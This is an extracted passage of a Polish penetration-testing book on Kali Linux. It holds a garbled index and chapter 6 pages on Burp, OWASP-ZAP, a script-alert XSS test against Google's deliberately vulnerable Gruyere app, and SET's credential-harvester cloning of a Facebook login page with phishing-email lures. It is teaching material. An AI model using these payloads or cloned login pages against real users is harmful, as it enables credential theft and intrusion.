ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
